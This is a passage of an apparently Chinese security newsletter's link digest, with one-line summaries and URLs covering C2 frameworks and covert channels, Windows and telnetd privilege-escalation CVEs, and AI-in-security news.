style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.praetorian.com/blog/et-tu-default-creds-introducing-brutus-for-modern-credential-testing/" target="_blank">https://www.praetorian.com/blog/et-tu-default-creds-introducing-brutus-for-modern-credential-testing/</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;color: rgb(62, 62, 62);padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">终端对抗</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Cortex XDR Live Terminal 主机名验证绕过漏洞分析及C2滥用技术</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://labs.infoguard.ch/posts/abusing_cortex_xdr_live_response_as_c2/" target="_blank">https://labs.infoguard.ch/posts/abusing_cortex_xdr_live_response_as_c2/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">MacNoise：macOS EDR测试和安全研究的模块化遥测噪声生成器</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://0xv1n.github.io/posts/macnoise/" target="_blank">https://0xv1n.github.io/posts/macnoise/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">notion：使用Notion作为隐蔽通信通道的Mythic C2配置文件</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/0xbbuddha/notion" target="_blank">https://github.com/0xbbuddha/notion</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Tyche：生成Mythic C2框架HTTPX配置文件的工具，帮助创建可塑性C2配置文件</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/Whispergate/Tyche" target="_blank">https://github.com/Whispergate/Tyche</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">azureBlob：Azure Blob Storage Sliver C2配置文件，用于云环境下的命令控制通信</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/senderend/azureBlob" target="_blank">https://github.com/senderend/azureBlob</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">KEIP：基于eBPF挂钩和阻止恶意软件包</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/Otsmane-Ahmed/KEIP" target="_blank">https://github.com/Otsmane-Ahmed/KEIP</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">pyinstxtractor-ng：提取PyInstaller打包的Python可执行文件内容</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/pyinstxtractor/pyinstxtractor-ng" target="_blank">https://github.com/pyinstxtractor/pyinstxtractor-ng</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;color: rgb(62, 62, 62);padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞相关</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2025-59201：NCSI本地提权漏洞，涉及注册表权限滥用和WMI提供程序加载机制</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://itm4n.github.io/cve-2025-59201-ncsi-eop/" target="_blank">https://itm4n.github.io/cve-2025-59201-ncsi-eop/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2025-60710：Windows本地提权漏洞的POC代码</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.mdsec.co.uk/2026/02/total-recall-retracing-your-steps-back-to-nt-authoritysystem/" target="_blank">https://www.mdsec.co.uk/2026/02/total-recall-retracing-your-steps-back-to-nt-authoritysystem/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">研究人员使用AI代理逆向工程Windows内核驱动程序，在30天内发现了100多个内核漏洞</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://ydinkin.substack.com/p/200-kernel-bugs-in-30-days" target="_blank">https://ydinkin.substack.com/p/200-kernel-bugs-in-30-days</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Delinea协议处理程序存在远程代码执行漏洞，可通过恶意网页执行任意进程</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://blog.amberwolf.com/blog/2026/february/delinea-protocol-handler---return-of-the-msi/" target="_blank">https://blog.amberwolf.com/blog/2026/february/delinea-protocol-handler---return-of-the-msi/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">telnetd存在环境变量漏洞，设置二进制路径获取SUID权限的/bin/sh实现本地提权</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://openwall.com/lists/oss-security/2026/02/24/1" target="_blank">https://openwall.com/lists/oss-security/2026/02/24/1</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;color: rgb(62, 62, 62);padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">人工智能和安全</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Aegis：适用于AI Agent的EDR</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/antropos17/Aegis" target="_blank">https://github.com/antropos17/Aegis</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">enject：将凭据在运行时注入AI应用，规避.env文件被读取导致的泄密</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/GreatScott/enject" target="_blank">https://github.com/GreatScott/enject</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">OpenAnt：基于LLM的开源漏洞发现产品</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/knostic/OpenAnt/" target="_blank">https://github.com/knostic/OpenAnt/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Semgrep的AI最佳实践项目，提供AI安全相关的规则和指导</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/semgrep/ai-best-practices" target="_blank">https://github.com/semgrep/ai-best-practices</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">介绍Google的CodeMender项目，探讨如何利用AI消除软件漏洞，以及AI在代码安全领域的应用前景</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.linkedin.com/posts/clintgibler_unprompted-cybersecurity-ai-activity-7434694664823394305-X3ic" target="_blank">https://www.linkedin.com/posts/clintgibler_unprompted-cybersecurity-ai-activity-7434694664823394305-X3ic</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">介绍Wiz公司如何利用AI和vibe coding快速分析约31K被盗凭证数据，发现至少37%的财富100强公司受影响</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.linkedin.com/posts/clintgibler_rami-shai-hulud-unpromptecon-activity-7435028911060717568-P-mV" target="_blank">https://www.linkedin.com/posts/clintgibler_rami-shai-hulud-unpromptecon-activity-7435028911060717568-P-mV</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">探讨AI对软件开发和漏洞赏金行业的影响，预测AI编码代理将导致漏洞提交数量激增</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://josephthacker.com/ai/2026/02/24/ai-s-impact-on-bug-bounty.html" target="_blank">https://josephthacker.com/ai/2026/02/24/ai-s-impact-on-bug-bounty.html</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AI代理在被拒绝代码贡献后，自主撰写并发布针对开源维护者的负面文章</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://theshamblog.com/an-ai-agent-published-a-hit-piece-on-me/" target="_blank">https://theshamblog.com/an-ai-agent-published-a-hit-piece-on-me/</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;color: rgb(62, 62, 62);padding: 0px 22px;line-height: 